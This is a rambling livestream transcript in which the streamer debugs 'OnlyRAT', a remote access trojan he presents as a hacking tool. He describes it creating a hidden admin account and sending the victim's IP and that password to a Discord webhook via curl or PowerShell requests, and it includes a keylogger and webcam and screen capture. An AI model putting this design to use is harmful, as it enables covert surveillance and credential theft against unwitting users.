a little bit. Because I'm probably not the place to ask, but where do I send the document you require from me? Send the company email, company@cosmodiumcs.com. Better to debug when you can't see it. No, definitely. I'm just a lazy ass developer. Yeah, let's actually listen to you and try some of this. So what we'll do is we'll delete this and hello, delete. There you go. Oh my gosh. So let's run the Discord webhook file. Alright, so you see the files appeared in here. It's cool. When I actually open up the file explorers, you actually can see how the rat actually works at times, because you can see the files. Yeah, you see the files popping in here and such. I was building something similar, remote access tool fully written in Python. I have like most of the features I want. I just got to put them all together in the terminal menu. Yeah, so we have a terminal menu for this. I'll show it to you guys later. Okay, did I not comment out? Oh, I'm so dumb. I am the dumbest programmer ever. How is it gonna work if we didn't even push it to the GitHub? So git update test, we'll call this test 1. Alright, so if we go to, I'm so dumb. Alright, if we go alright, test 1, there you go. Alright, so that's how you know it's actually working. So we're just going to do that entire thing over again. Sounds fun, guys? Sound cool? Awesome. Alright, so I feel bad. You guys have to watch my content. I really do. Delete. For the record, I am going to make it so that way I don't have to see. I'm going to make it so I can actually see what we're doing. Don't worry. I am listening. But yeah, definitely love to see what you're working on with the Python thing. Hey, physics, yo, what's good? But nothing like programming a rat in PowerShell or Rust. Dude, this rat is using 5 different programming languages. 5 different programming languages. Yep. Yeah, it hurts my brain to program this thing. It really does. Why did it delete the files? I swear that we had it so that way it wouldn't delete the files. I swear we did that. Did we not do that? DW2.ps1. What did we do? Did we not comment out the deletion section? What? Bruh. Alright, hold up. I'm about to slap this virtual machine in the face. I'm gonna check it on the virtual machine. Maybe his network stuff is being weird. Let's go on GitHub. gonna file a lawsuit. What time is it right now? It's 6:02. This virtual machine is wrong. It says like 3. It's 6. Let's go on OnlyRAT. Does it say test right here? Does it say test right here? It should say test right here. Come on, virtual machine. Come on. Push yourself. You can do it. You can do it. Just load. Just load. You got this. Oh my gosh. It is 3 a.m. and you're watching the stream. I respect it, bro. I respect it. Alright, so there you go. That's all I needed to do. I'm closing the freaking browser. I just needed to see if it's freaking internet stuff. Maybe we need to run it again. Actually, you guys can see the random malware stuff in here. This is the screenshots, I think. Yeah, this is the screenshot program, I think. I can't remember if I'm being honest. This is the keystroke injection stuff. Yeah, awesome. So we know it's, working somewhat. I think we just need to, run it again. Oh, I know why it's not working. Wait, I might know why it's not working. I actually don't know if I know why it's not working. We'll let this install. But it might be because it might be still downloading older versions of the files. Control F, stage. DW1. Is it downloading a different stage? Discord webhook. Yeah, it's downloading stage 1. No. No. Freak you. No. Bad dog. This is terrible. No wonder it's not working. It's not even using the right protocol or anything. Oh my gosh. My brain. Alright, so now we just need to let this freaking... Oh my gosh. Get update. Test 2. Oh my gosh, mate. Oh my gosh. Alright. We'll let this thing... I don't know if it finished or not. I'm gonna just wait a couple of seconds. Oh my gosh. Physics living between time zones. VCOS smash. So are you continuing the OnlyRAT project? Yeah, right now we're working on it. We are working on it. We're making it better. I think it finished. Honestly, I don't care. We're just gonna rerun this thing. Oh, wait. Hold up. I know, alright, I have no idea if this thing is even, look how slow this virtual machine is, mate. This thing is slow. This thing is on its last legs. Oh my gosh. Alright, GitHub just, is it even worth checking? Will it be able to check it in time? Come on. Test 2. Alright, perfect. I just needed to make sure. So, in theory, that should fix everything, right? So let's delete these files. Delete. Alright. So, attempt, what? 434? I hate when stuff like that is like the freaking problem. Like something so small. I was downloading the wrong freaking file. Did I save the file? Did I even save it? Okay, I did. Thank God. Alright. So it shouldn't delete these files. It should just keep them there. It should just keep them there. It should, hopefully, God willingly, just keep them there. Use VMware Community Edition instead of VirtualBox. I would, but I can't. I don't think you can make snapshots for free. Okay, it deleted the files anyway, but you know what? Fine. Did it post anything to Discord? No? Oh my gosh, mate. Oh my gosh. So why is this not working? Oh, we're using the old version of the Discord webhook, aren't we? Stage 1. I freaking hate everything. I want to... Oh my gosh. Save this. Oh my gosh. We're using an old version of the installer. This is the third time I had to freaking rerun the same file. Oh my gosh. PC was being weird. It's fixed. Got you. Welcome back. Group donations. Get Cosmo more RAM. We when nuking Cosmo DMs. I honestly don't get the notifications because I'm streaming. But I will check out the notifications after. You can't kill what you can't see. Mate, I know. That's why I'm trying to get them so I can see the files. It didn't delete them. See how the files are still there? Look at that. We can actually examine the code now. But it should work now. In theory. Oh! It sent us something. It sent us system.object. That's not what we're looking for. At all. At all. But we're getting there. We're getting there. It said config. So it had... Alright, so we're getting there. We're close. Alright. Finally. You know, we can get past this freaking wall, man. Oh my god. Why did it take so long? That's so sad that that was the problem too. Alright, get content. Is that even the right thing? Maybe I was just using the wrong... I'm pretty sure get content, right? That's the thing. Yeah, get content, and then we're getting the content of the username.rat. Alright. So content equals... Oh, maybe we need to make a separate variable like how they were doing it. So we'll do $, let's choose some random text. What random text are we feeling today? I feel like this one's up to par. Alright. So this one will equal to the get content thing. I honestly have no idea if this is going to make any difference, because I doubt it will make any difference if I'm being 100% honest. But yeah, there you go. So that should actually get the content of this file and save it to that variable, and then we can include it. Alright, so let's get update. We'll do test 3. Awesome. And go back over here, and you guys know what we're going to do this time. We're going to... I should probably delete this. Actually, let's check if the webhook is working. So let's check the webhook.rat file. Just open in like Notepad or something. I don't care. Just Notepad. Thank you. So yeah, it got the local IP address, the admin password, the temp directory, and the startup directory. That's what it's supposed to do. So that's the whole. What we should see in Discord is, bro, just open it with this. Open with Notepad. Oh my god. So this is what we should see in Discord. This is what it should look like. Alright. Feel free to DDoS this address. So, in theory, that should work. Alright, let's delete this thing. Alright. So, run this again. How much RAM do I have? I have 32, I think. What was that? 2 sticks of 16 is 32. Yeah, it's 32. Or is it 16? I can't remember. It's either 32 or 16. Hold up, bro. See, now I have to check. How do you check how much RAM you have? I'm fairly certain it's either 32 or 16. I'll literally look at it after we run this. Drop some good hacking tools. I'm setting up all my tools. Maybe I missed one. Drop all my good hacking tools. This is the best hacking tool out here. OnlyRAT. What are you talking about? Hey, why are you not so active in Discord? I just been gone for a second. I was working on the new course we just released. Actually, check it out. Cosmodiumcs.com/courses. We have some cool courses over there. We just released the Introduction to Ethical Hacking course. But I'm back, boys. I'm back. So I'm back in the Discord. You'll see me in there again. I'm sorry you guys missed me. So if we go over to Discord, No system is not an object. All right. So it's just a system.object. Super weird. How did we do it in the test? How did we do it in test? All right. So what we did is get content of the file.txt. Maybe we should just specify that. Maybe instead of this, we'll just do the $environment username dot rat. All right, and then maybe we'll comment this out for now. Maybe we'll get rid of that and just see how that works. All right, so this is test number 4. Awesome. And we can go over to virtual machine and run this. Delete. Yes. All right. So let this run. Any malware development courses coming up? Yeah, I'm working on malware development right now. We also have a guy coming on. He's going to teach some malware stuff as well on the website. So yeah, definitely check it out. Don't give me any ideas with fuzzer I've been playing with. Hear about Moby. Oh my god, my English is terrible. Moby Hook. I did not hear about Moby Hook, if that's how I say it. Gotta go, hack flash style and DDoS crypto scammers. Now the Cosmo test Discord. Most definitely. Alright, I think it finished. I was honestly not paying attention. Let's go over to the Discord and system.object. Alright. Why is it doing that? No system is not object. Alright, so why does it think system? Why is it getting the system? Can you echo? Is there any way you can get the content of a file a different way? Right, other than get content. You could cat it out technically with PowerShell. But like, let's go in a virtual machine and do some fun testing. Alright, so we're in our downloads file, right? Let's echo hello to file.txt, right? Awesome. Oh, whoops. That's not, I meant to do to a file called file.txt. So if we list, there's our file.txt. So I mean, we could cat file.txt out, but using things like cat doesn't always work as well. What is get content, right, of our file.txt? Does the same thing, yeah. Because cat in PowerShell is just an alias for the get content, so it's not going to do that much of a difference. Can you like echo the file.txt somehow? I mean, obviously that's going to print out that. I mean, can you echo the content somehow? Alright, let's see if there's an alternative way we can get content. So, get content of file PowerShell. Or we can try finding a way to send us the file. There's also an alternative, right? Because I didn't really try too hard. Send files in Discord, webhooks. What was the thing that they left at the bottom? So let's do code send file.ps1. So if we throw this in here and close this, so we'll get our Discord webhook right here. Awesome. So if we throw the Discord webhook right there, awesome. And then the file path would be C users. Then we can do $environment username. And then whack sample.txt. Oh, it's in our downloads. And then whack file.txt. Is that where we have it? It is. Awesome. So users, environment, username, downloads, and then the file.txt. And then the rest of this should be some sort of sorcery, right? So, so if we /send file.ps1, definitely. All right, so instead of file, can we just do red row, because that's the actual user of the computer, just see if that works. Still doesn't work. No characters are allowed after a here string header before the end of the line. Yeah, I know about that. Let's get rid of the semicolons. We actually don't need those. Maybe that's what it's talking about. I honestly have no idea. Nope. All right, definitely. All right, so that just looks like it doesn't work. We can find some other way. All right, let's see. I don't know. This is too much code. Just send a file. No, I refuse. File Discord webhooks guide. Huh. So I've been missing out on the chat. Noob 7.0 is the best Android rat out there, unless Pegasus was downloadable. That's funny. So if I was, oh, you can use the @ right? Yeah. I knew that. Can we try that? Can we just do? Where's our test? Can we control open and get that test? Oh, do we still have that test file in here? We don't, do we? All right, we'll just try it. We'll just grab the code off of our Linux computer. Where is the test? We'll just Control A, copy that whole thing, and Control A, V, Z, Control V. All right. I don't know why there's so many. All right, so get rid of all this. All right, so we'll get rid of this, all this. So we'll get rid of that, get rid of that. Oh, whoops. Tab that over, backspace. All right, perfect. We're back in business a little bit. So body equals this. So if we just get @ file.txt, that should do the trick, right? That should do it. If we send files at ps1, the splatting operator cannot be used to represent. Interesting. Am I forgetting like quotes or something? Dog.jpg. Oh, wait. I should probably finish reading the information. Yeah, So we just replaced the URL with something, right? So embeds image URL and then attachment at pizza. Oh, got you. See, I knew this, guys. So instead of payload.json, do we just take this, replace this, cut that out, and is this our Windows computer? It is our Windows computer. All right, cool. I was super confused for a second. See, now I'm confused. Right control. So content type, multi-part, form data. You just have like a full example I could use real quick, just like so an example, file1 is equal to @cat. So payload JSON. So embeds title test. So embedding attachments is you can use the attachment. So instead of, oh, URL, like that URL quote, do I have to replace that with the Discord thing, or, because they didn't really say. So put the attachment inside file within its file name, not field name, that it will also attach the message. I'm so lost. Oh, URL colon attach. Okay, yes, that's what they're defining the URL. I'm still kind of confused a little bit. So content. Oh wait, how do you embed things? Isn't the embedding a little different than everything else, right? Alright, I'm gonna figure this out, guys. Oh, pizza. First of all, file that txt. That's the first thing. Second thing, instead of Nomad, we can just do test. Hello, that line got my script kitty heart. Don't just have a full example I can use. That's what I'm saying, dude. That's what I'm saying. Why is it so confused? Oh, it just does not like that syntax, does it? That sounds like a you problem for real. File.txt. If we list, file.txt is in here, right? Yeah, it is. All right, awesome. So we run this. What's it saying is wrong? Attachment file.txt. Maybe it's part of the. Maybe it's the contents. Oh, it can't be the content. Maybe we need to specify it as the. Whoops. Right control. Alright, so payload underscore JSON. Is that like an actual requirement? Oh, how do you oh my gosh, if you do this one more time. Alright, I'm gonna leave that tab open, but in the meantime I'm gonna need a little bit more. Send files using Discord webhooks, not Python. Freak Python. PowerShell. PowerShell is where it's at. Can I do PowerShell? How long have I been developing malware for? 4 or 5 years probably. Because it started when I was 12. I'm 18. So, I mean, I wasn't as good before, but I've gotten better over the years. Did I not open this in a new tab? I swear I did. Oh, is that the thing? Oh, no, this is the thing. I swear I already used you. I swear I did. Oh, .json. Oh, I probably should have looked at this earlier. Oh, do you have to put the @ thing before it? The little this thing? I'm so confused. I am. I genuinely am confused. So instead of content, it's a different parameter. I know it is. Like, you don't put content, you put something else, but I don't know what you're supposed to put. .json, comparison with curl. Oh, you can use curl? That's pretty straightforward. So optional arguments to oh yeah, Discord documentation. Love this. Files. Oh, so you literally just put files, and then can I just control files? Definitely. Yes, I definitely see how they're doing this. Refer to uploading files. Perfect. Mate, do you just have? So image data, uploading files, editing message attachments. So indicated by the files n parameter. What is the n? For the attachments parameter. Alright, so instead of content, you do files. And then, is that all I have to do? No, instead of, alright, so Right control. Alright, bro, I'm a dip. See y'all. See you. Oh, that's really nice. Appreciate it. Appreciate it. Multiform payload. So files. Can you just show me an example, mate? Show me an example. I'm so lost. Alright, so do they have a file thing in here? Highlight all. Let me see this. So name files. So name equals files colon 0. File name is equal to. So yeah, that's the JSON. Oh, so you can do the payload JSON and then can you just send the JSON? Got you. How do you do that? It's like more every day I realize more and more how lazy of a developer I am. Alright, so do you guys just have like send files? I wonder if they just have an image that shows you how to do it. Like, let me see this code. This won't work, sorry, it's all good. You can enter your content here, enjoy. Yeah, but I need more than content, mate. I need files, mate. How do you send the files? I'm literally looking at images. This is how lazy of a programmer I am. I'm looking at freaking images instead of figuring it out myself. I started last month and worked on building a rat in my first project. I'm only 15, really know much. But this is something that interests me. Oh, for sure, for sure. We actually have that's the wrong thing. Let me go on here. If you want to see how this actually started and such, I can actually go on playlists, load. There you go. There's a view full playlist. There's a OnlyRAT playlist. I don't know if the share link and the actual link are different, so I'll just copy this just in case. But if you guys want to check out the playlist for this thing, I'll put it in there. But payload. Oh, can you just send the JSON? All right. So if we have the JSON stuff, can we just send that? How to send attachments with file. I don't like this, man. I don't like this. Curl. Sending attachments. We'll just use curl. Honestly, that works. Because PowerShell has curl, right? I'm not tripling. Hey, no, PowerShell has curl. PowerShell has curl. Curl. Yes, mate. There you go. So, we'll just use curl, you know, because it's ready in PowerShell, right? Lazy developers are the best because they figure out how to make the computer do all the work. I love that. I'm gonna have to get that tattooed on my foot or something. And control. All right, so we're gonna copy this. All right, and then what we're gonna do is we'll just do it at the bottom here, so we can just modify everything. So instead of webhook URL, we can just do this thing. Paste. Okay. Alright, so payload, JSON, content. So username and then file1. Alright, so can we just do file dot txt? We don't have to worry about this last line. And hopefully that should work, right? Right? Right, guys? Curl? What do you mean curl is not a command? Curl is an alias of invoke web request. Alright, bro. Alright, bro. You wanna be like that? Windows will be like that. Alright? Freaking heck, mate. Oh my god. Freaking Windows. Anyways, send file. Alright, a lot of errors. I have no idea if that even worked. Can we go to our Discord server? Still says system.object, my favorite. Alright, let's figure this out, mate. Let's figure this out. Maybe it's because it's different lines. Or maybe it's because we're trying to invoke a web request instead of using curl. Alright, is this how... Alright, let's try this. I think this will work. I don't think this will work. So, a parameter cannot be found that matches the name F. Maybe because you're not actually using curl. Maybe it's because you're using invoke web request. Let's do curl and see how this works. Invoke web request. Yeah, I forgot curl doesn't like actually exist on Windows. Freaking Windows, man. I freaking hate this stuff. I don't understand. So if we can't get curl to work, because Windows doesn't actually use curl, we're going to have to figure something else out. Command prompt. PowerShell. I'm going to jump. The day I just read the documentation, I swear, freaking, they have PowerShell syntax right here. It's in bold. It's in bold. Oh my God. I am too lazy of a developer. It's okay to be a lazy developer, but to the point where you're just skipping over the actual documentation, it's in bold. Oh my gosh. Oh my God. Oh my God. Dude. My gosh. Anyways, we're just gonna pretend like none of that happened, alright guys? That sound good to you? So they have the one-liner right there. What? Crazy. I didn't have to format it myself. Oh my gosh, guys. I'm gonna freaking I copied the wrong line. Whoops. Oh my God. There you go. So instead of this, we're going to do the invoke web request tech H. Last time I used Windows, it's my main OS. Wind blows, yes, bro. Wind does blow, dude. It really does. Last time I used Windows as my main OS was when I was 11. Yeah, I'm not even using Windows. This is a freaking virtual machine, mate. I'm on Linux. I'm on Linux right now. But no, we have to use Windows because you guys see this? My whole thing is, did it just stop working? What? Oh my gosh, my whole computer is just trifling right now, boys. I'm so sorry. Alright, so what we're going to do instead of the content. Alright, anyway, let's see how we can get this freaking file onto here. So there's a tag F. Username, content, and then file. Alright, so we can do webhook URI, and then we can do content. Alright, so backslash quote, we'll do file backslash quote, and then colon is equal to backslash quote, and we can do at file.txt backslash quote. I think that's how it works. I honestly don't know, so I'm just kind of praying right now. Oh my God. Cannot bind parameters headers to content type. Oh my gosh, mate. Oh my Lord. I know PowerShell can run batch, right? Maybe batch might work better. Command prompt. Sending attachments. So the tag F, right? Maybe this just doesn't work. Maybe that's what it is. F in the chat. Yeah, I know. That, that's me using slowest. I'm such a bad reader. The last time, that's me using slowest on you. Gotcha. Bro, I swear, like, this needs to be, look at this documentation. No one wants to read all this. Who wants to read all this? How do we, let's, you know, search. Let's search a file. Uploading files. Isn't this the thing I'm already looking at right now? Yeah. Editing message attachments. Oh my gosh, man. So files 0, 1, and 42. What is the callback? Oh, there's the attachments. Maybe that's what we need to search for. Attachments. Freaking. Oh, I freaking hate everything right now. I hate everything. Freaking Reddit. Let's look at Reddit. Honestly, I don't care at this point. Alright, what we need to do is we either A, get the content of the file and just send it to you guys, or B, we get the file sent to you guys, which I think would be a lot more ideal. So PowerShell, you have to escape with this. JSON. Oh my gosh. So it says there's the tech F parameter, right? So if we do all this in our PowerShell, there's tech H, tech D, and then if we did tech F, and then just did our file.txt, even if we put the @ sign in front of it. So let's try all this. Let's run this. And obviously that didn't work. We're going to check Discord anyway and see that, hey, it still didn't work. So we can try removing this thing right here. Headers cannot convert, whatever. Alright, moral of the story is Windows sucks. We do curl. Not like it's going to make a difference because it's just going to run the same command. It's going to say invoke web request doesn't work even if you use curl. So, alright. Probably time to the file being sent sounds better. Yeah, that's what I was saying. Probably time it's sent the file every 60 seconds. So right now we're sending the. Some of you guys don't even know how the rat works. See, this is why I'm so rusty at streaming. I didn't even explain where we're at right now. I didn't explain anything. Let me show you guys this. Let's go on. Let me go on my home drive because that's where I have my stuff. So let's do sh partition real quick. All right. So I'd like to introduce you guys OnlyRAT. OnlyRAT is the tool I've made. So hey, look, that's me, Blue Cosmo. Yeah, look at this fancy little art. So basically you have the ability to add a configuration file to your command. So you would run something called OnlyRAT and then bluecosmo.rat. So let's do that. We'll do OnlyRAT, and actually if I list, I have some configuration files, right? So you see redrow.rat here, you'll see bluec.rat. What those basically are doing is when we run that installation process, right? You remember when I was running the that Discord webhook? What that's going to do is send us that redrow.rat file that we generate on their computer back to us. So that way we know what information we need to access the computer, right? So it'll give us their IP address, it'll give us the password, and of our admin account that the OnlyRAT creates. So that way we can remotely access their computer. So when we do that, so when we do that, basically it'll send us back the username of the computer.rat, right? So we'll do OnlyRAT, and I'll just do the redrow.rat one we have. So then it gives you like this kind of in console thing that we have. Nice ASCII. Appreciate it. Yeah. So what we can do is help for the help menu, right? And this gives us information on how to actually use the OnlyRAT, right? So here we'll have things like the remote console, so that way you can remotely access the computer. You can have things so you can fix the remote console, you can upload files onto the computer, download files off of the computer, you can restart the computer, you can shut down the computer, and you can also have the kill switch will remove the OnlyRAT from the target computer. I actually don't know how well the kill switch works, so we're going to have to fix that in a later episode. But right now, we can, this is some of the stuff we have right here, right? So we can install the keylogger, we can install our screen capture, we can install our webcam software. All of this I programmed, so if you guys want to know how to build most of the stuff, you can check out the playlist I linked earlier, because I did build pretty much all of this. So basically we can install keylogger on the computer, install the screen capture, and then we can grab that information off their computer, and then here's some other general information to help us out. So if I were to do like or console, for example, this won't work because we don't have this is an old house right here, and I think we changed the password, so it's not going to work. But that is OnlyRAT as essentials. So that's kind of how it works in a nutshell. If you want to learn more about how it works, you guys can just go through the playlist. But what we need to do is get this red.rat file that we create back to us. So we used to use SMTP, which would email it back to us, but Google was like, no. If you guys watched that, you remember earlier in the video when I was talking about that Google can suck my blank video that I made? Yeah, that's why. So instead, we're like, all right, let's use Discord webhooks to send us the file. So that's what we're trying to do now. So that's kind of like the life update on OnlyRAT. Hopefully that's kind of clear. I'm sorry if it was not. Usage, curl, tech sh. So, all right, you know what, curl? Oh yeah, so it's saying you have to install curl. We can't install curl. No wonder that wasn't working. Maybe if I read the freaking information, I would know. The errors pausing on that screen seem to indicate dictionary issue. No, so what my main concern right now is Windows doesn't even have curl. So we need to find a good way. Is there not just like !YT send files Discord webhooks? Let's see if anyone's done it. See if anyone, how to embed info into channels step by step. No, just how to automatically post your YouTube video. No, just how do you send a file? How do you send a freaking text file, mate? This is not rocket science. Oh my gosh. It's not rocket surgery either. Sync notifications. No, mate. No, just how do you... Alright, mate. That's fine. We'll figure this out together, guys. That's what we do. What language is this? Is that just JSON? Alright, gotcha. Intro. I need like application commands, because I know oh my god. Alright, this is not helping me at all. No disrespect to Discord. Send files in Discord webhooks. Let's see their code. PowerShell to Discord webhooks. Oh my gosh. Install module. Oh, do we have to install a whole module to do this stuff, man? But no, we sent messages earlier. Add an author, add an image. That's like the closest. We're not getting a whole URL, mate. You imagine we just started a whole web server on the target computer just to download the file off of? That's hysterical. That is funny. That's the type of stuff I would try to do too to get this to work. All right, so their code is not showing any promise, no disrespect. Comparison with curl. So username and then content JSON compress. All right, so their optional webhook arguments. Is this the developer portal that they already gave us? Yeah. File embeds. Maybe we need to do embeds. Maybe that's what we're missing. Embeds. How do you just add an embed? How do you this? Okay. Well, we'll figure it out together, guys. We're in. Yep. I don't even know what I'm trying to do. Snag a screenshot of that last red error. Shoot some links and stuff in Discord. Yeah, I'll do that. Sorry, I've not been looking at chat at all. Where's cannot Brian? But I honestly think it's a curl error. Here, let me open up. Let's go out of full screen, and down here, this thing. Grab current window. Take a screenshot. Copy to clipboard. We'll go on Discord and send this to good old Machine Man. There you go. All right, message. Upload failed. What do you mean upload failed? I'll add a friend request too. No, that covers it. You can also check if there anything on Telegram webhooks. I mean, sure, but like one thing at a time, right? If we can't even get Discord to work, you know, one thing at a time. But yeah, definitely. So what? Execute post / whatever. Alright, so that's GitHub stuff. Oh my gosh. So let's, how do we do this? Alright, honestly, this documentation is terrible. It doesn't give me any examples. So I see like file. Can you send, do they talk about how they can send, alright, so color, oh, they have a lot of information. So color, author, title, URL, fields, file footer, bunch of other cool stuff. Webhook example. So they just have JSON. Got you. JSON stands for JavaScript Object Notation. Super cool. Can we just use JSON? Is that how it works? There you go. Dang, bro, this is like examples. Nah, mate, I just need files. But they don't even say that. How about embeds? So description. So not the color. Title, image. Oh, we had to get like a web image. Yeah, all right. The file would be so much easier, mate. So, is that just in the JSON? this is blowing me on like a whole new dimension. What do we think, guys? What do we think? Also hide the attachment from the image. So file equals add pizza.jpg. So it's talking about curl for PowerShell. I don't think we have any of this other stuff though. Like what's HTTP/IE? Is a command line client just like curl. Windows can be installed with Python. Yeah. Ah man. Alright, Machine Man DM me a link. I'm gonna look at the link. At login, username, password, author and token. Gotcha. See, the problem isn't necessarily this, because we can send stuff to the Discord server. We've done it before. Where's the real crappy Discord that we made? Right, so if we go on here, right, we're able to send like hello world, we're able to send links. And I'm trying to see if we can send files. Accept all your cookies, thank you. They'll delete when I close the browser for the record. Alright, this clearly is not working, so we're gonna skip that. Creating this thing is like the most helpful I've seen so far, but it still doesn't give you everything. So we'll keep that open. You know what, we're gonna have to go on more results. PD Discord, sending a webhook. Discord webhooks, sending messages. Discord, blah blah blah. Alright, mate. Alright, mate. We need to figure this out in a better fashion. Like, we can do the file content for now and figure something else out later. Get content on file, PowerShell. But that's what we were doing before, and yeah, we did the get content, and yeah, so that we were doing that before, and it would just say system.object or some dumb stuff like that. Alright, let's look at his oh whoops, let's go make a new tab, because come on, Discord, you guys have to have some better documentation for how to send files. It should not be rocket, because you guys have file contents. The contents of the file being sent. Interesting. Can you just send the file instead? What? No, the content file embeds. Embed structure. Image. Alright, I think what we'll have to try doing is embedding the file content instead of embedding the file. So what we'll do is go on this, I'll open up our test, and I'll copy this whole thing, and we'll go over here and we'll paste this in here. Oh my lord. Because yeah, we've gotten the file content before. There you go, that makes it a little bit cleaner. Not by much, but somewhat. Alright, what we need to do is kind of figure out like how to send this thingy-majig. I'm going to just close this. Honestly, that's not working. So we'll just close that. So we can do username, and we'll keep that commented out for now, right? We'll Control X on this, and then the content we can actually have, like we did it before. We did get content file.txt. So we'll do this. So if we uncomment this and uncomment this, All right. In theory, Nomad, we can just do config, and in theory, right, if we comment this out, that should work. So let's try this. Send file.ps1. So if you check our Discord, it says hello. All right, so we got the file content like that. So yeah, it sent us like the content of that file. So if we incorporate the same exact thing into this, unless if we don't save it as a .rat and save it as .txt. Is that what it is? Like if you get content of a rat file, right? If we echo hello to file.rat, or we'll just say text.rat, so we can just identify a little bit easier. If we do get content of text, it still gets hello, so it doesn't matter what the extension is. What? This doesn't make any sense, mate. All right, so what we'll try doing is, theoretically speaking, this works, right? So excuse me. So if that works, then we should be able, to incorporate that same exact thing into this username, which is config, and then the content, which is equal to get content of the username.rat, which is just the same thing as this. So we'll copy this, and we'll just get the content of this variable, right? And that should work, but it doesn't for whatever reason. Unless if we change our directories or something, get content of that, and then this, and then we don't set our location till later. Seems with files and auth tokens is much harder. Hash table since it's a header. Oh, is that what it is? Something like that? Where's Discord? It's a PowerShell bug. Oh. Got you. Alright, well in that case, we'll just send the file contents like it's doing here. Until we can fix that, we'll just send the file content. It should, I mean, it still works the same way. Just send file. So, oh yeah, so that send file should work. So now with this, is that actually going to work, or is that just not gonna? Because this is what, getting the username config, and then this, and then get content of that. And then invoke request method URI with this, the body, and then oh, this is the URL, get content. Yeah, so this whole thing should work. You know, we can only hope and pray, but I'm getting kind of tired of this thing, man. I'm trying to test number 5. Let's go. Alright, so let's go into our Windows virtual machine. We can close this, and in theory, if we do Discord webhook file here, alright, I guess we kind of just wait, right? Oh, I messed up the keystroke injection. It's fine. Yeah, in theory, that should work, right? So we have our red row, that rat right here. All right, properties, freaking opens with notepad. Just be normal, please. Okay. So red row dot rat. All right, yeah. So it's getting all that random stuff. Can we right control go into Discord? Let me see what it looks like in Discord. So it still says system.object. I think it has to do with the way it's getting the content. Oh, you know what we could have it do instead? Instead of creating a rat file, it just sends it to the user through Discord. Oh, got you. All right. I'll be right back. I'll use the restroom, fill up my water, and then we are going to tackle this because this is starting to piss me off. We're back. Oh my god. I forgot how annoying projects like this are. Alright. We got this, chat. We got this. All I need to do is figure out. Oh yeah, what did I say before I left? What was my great idea? Oh, sending the thingies individually. Yeah, so basically what I wanted to try to do is have the OnlyRAT, instead of adding it all to a file and sending us the file, we'll just send us the contents of the file to the Discord. I know. You guys are probably thinking, Cosmo, how did you get so smart? I have no idea. I really don't. Alright, so let's do that. What we need to do is comment this out. Basically all references of this we're going to have to comment out. So let's comment all these out. So what we need to do is take these and send them to us in our content. So how we do multi-line content again is the we did the at colon or quote at, right? And then what's this thing? Alright, we're gonna even delete this. Oh. Why is that not working? How did they do it? How did how did they do it? Because clearly the universe doesn't like when I do it. So Who was the person who did the multi-lined beanies? Hydrated, yes sir. Tactical hydration. I don't know who said that in one of my streams, but okay. So oh, do we just need to add text in here so that way it doesn't trip? I don't remember how we did this. I honestly don't. There was a way to like have it so. Oh, you had to use single quotes. That's what it is. See, I told you, dude. I told you, dude. All right. So let's add stuff in here. Let's say can you do the $ like variables so you can still have? All right, so this is the username. No. Let's look at the actual OnlyRAT file so I can remember how this file works. Yeah, so we'll just delete everything up to the IP address. Yeah. So it gives us the IP address of the computer. So we'll do right control. So this right here, this 80 whatever, that's the IP address. So we'll have this in here. Oh my god. So now we have to make this like one big string. Or get command curl. See, I would love to, but Windows doesn't actually use curl, which is why none of our stuff is working. We have to actually install curl. Because curl is just an alias for invoke web request on PowerShell. Unless, can we use CMD and then curl? Wait. CMD has curl? I knew something was up. Bro, this whole time, I was about to edit my whole file, do all the things. Oh my god. Freaking hate everything, man. Of course CMD has curl. Why wouldn't CMD? That CMD is the type of person to have curl, bro. Alright. So what we need to do is oh my god. So content, we can just say configuration file. So what we need to do instead of this thing is do, what is it, CMD? How do you run commands with command line? It's like alright. So let's go back into power. Can we do CMD/C and then let's do like dir. I don't know if that's actually working or not. What's a command you can only run in like CMD? I don't know. But I'm gonna just assume that works. Alright. Let's hope to God. Alright. So CMD/C. And then we're going to run the curl command from before. Oh my gosh. We should just try the command prompt version, honestly. So then username, test, content, hello, and then our webhook URL is actually going to be this variable right here. So we can do $ this. So all we need to do now is add the tag F. Alright, that looks good. Sorry for eating, guys. I didn't eat food when I came home, so. If we do file dot txt, is that going to work? I'm just going to run this command in PowerShell. Alright, and then all we need is our Discord webhook, so we'll just get you can only select one HTTP request method. Yes, both posts. Oh, there's something wrong with the command. Curl tag H content, type application JSON username, file 1. Oh, maybe I didn't select the right syntax. Maybe that's what oh. My heart skipped a beat for a second, y'all. How do we add it to the rest of this thing? Fill JSON username test content hello, and then file equals. I honestly don't know. Mati, what's up? What's up? What's up? Not sure it matters, but there's also content type equals application JSON. Yeah, that's in here. Application JSON. All right, so username test content hello, and then our file is equal to @file.txt, and then, or maybe it worked, and maybe I'm just not checking. All right, I'll just do L just so I can separate that old stuff. So let's go ahead and test this stuff. If I do this whole thing right here, and then we'll go into here, go into PowerShell, paste it, and then we'll go into here, copy this webhook, and paste it. You can only select one HTTP request method. You ask for both post and form post. Oh, okay. So let's get rid of some stuff. Right control. So maybe get rid of the tag D and just do the tag F. Alright, so let's try that. So we'll only go up to the tag F and then delete all this. There you go. Message request contains invalid JSON. Oh my god. Alright, let me think. What's going on? cmd/c curl tag h content type application JSON. Do we still need the tag D? All right. Maybe right control. All right, let's go into damn, deleted my awesome comment. I didn't even see it, bro. I'm sorry. Seems the header one system, that's not dictionary. You're passing the system string. Oof, that sounds like something I understand. Let me open Square over here. All right, let me see this. So we do the tech F. If we post this in here, obviously we can have that tech F there because we just did that. Do we actually have to backslash all those? That doesn't sound right. Maybe it is completely 100% right, and I'm just being petty. You know what? We'll just trust the code for a second. So why can't we have the tag D? Maybe we can have the tag D. All right. Whoa. Right control. All right. So instead of this right now, just for right now, we're going to actually put in the webhook. So let's get this. Let's copy this. Let's paste that right here. Configuration file. Oh yeah, maybe we want to just do test, for example. Cool. So if we copy this whole line and went here, went to PowerShell, pasted it. Yeah, it's saying you can only do one because I'm doing tag D and then tag F. So how do you do both? So, oh, tag method post. You ask for both posts. You select one HTTP method. You ask for both post and whatever, I'm assuming, or warning tag D data and multi-port form post. Oh my gosh. Unless if we, can we like, oh wait, yeah, we're running it as CMD. What if we run it in CMD itself? So CMD and then Control V and then, oh yeah, let's actually I'm gonna just put this in the lower section right here. So instead of CMD, see, let's take this out. Oh, wait a second. Was our code just really weird? Has that been the problem this whole time? I swear to God. PowerShell. No, alright, it's still having the same issue. Never mind. Man, this is, I freaking hate PowerShell, man. This thing is terrible. I don't know. I need to think this out, y'all. If that isn't going to work, what is? Can we include the tag F in our JSON here? Like, can we have the sending attachments? So tag F payload.json sets JSON body. So if we did tag F and then username test hello, and then got rid of this. So in here 